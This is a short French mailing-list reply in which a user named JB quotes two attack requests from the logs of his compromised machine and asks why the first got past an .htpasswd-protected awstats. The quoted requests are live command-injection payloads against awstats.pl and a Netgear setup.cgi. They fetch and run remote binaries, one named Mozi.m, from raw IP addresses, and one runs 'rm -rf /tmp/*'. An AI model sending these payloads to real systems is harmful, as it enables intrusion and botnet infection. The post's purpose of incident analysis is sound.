Re: Machine vérolée
Porte d'entrée trouvée :
GET
/awstats/awstats.pl?configdir=|echo;echo%20YYY;cd%20%2ftmp%3bwget%20131%2e220%2e92%2e80%2fcacat%3bchmod%20%2bx%20cacat%3b%2e%2fcacat%20216%2e102%2e212%2e115;echo%20YYY;echo|
HTTP/1.1\n"
"GET
/setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://27.45.37.235:51873/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1
HTTP/1.0"
La seconde requête échoue (firewall sortant et script inexistant). Ce
que je ne saisis pas, c'est pourquoi la première est passée, awstats
étant protégé par .htpasswd.
JB
Reply to: